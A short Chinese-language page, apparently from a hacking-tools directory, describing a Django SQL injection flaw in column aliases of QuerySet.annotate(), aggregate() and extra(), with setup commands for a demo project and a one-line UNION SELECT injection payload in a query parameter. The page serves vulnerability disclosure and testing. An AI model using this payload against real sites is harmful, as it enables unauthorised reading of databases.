黑客、渗透测试和网络安全工具,武装您的安全武器库!
在 Django 2.2 至 2.2.28 之前、3.2 至 3.2.13 之前以及 4.0 至 4.0.4 之前发现了一个问题。QuerySet.annotate()、aggregate() 和 extra() 方法在通过构造的字典(带字典扩展)作为传递的 **kwargs 时,容易受到列别名中的 SQL 注入攻击。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
poetry install python manage.py makemigrations python manage.py migrate python manage.py loaddata data.json python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
CVE Mitre
Django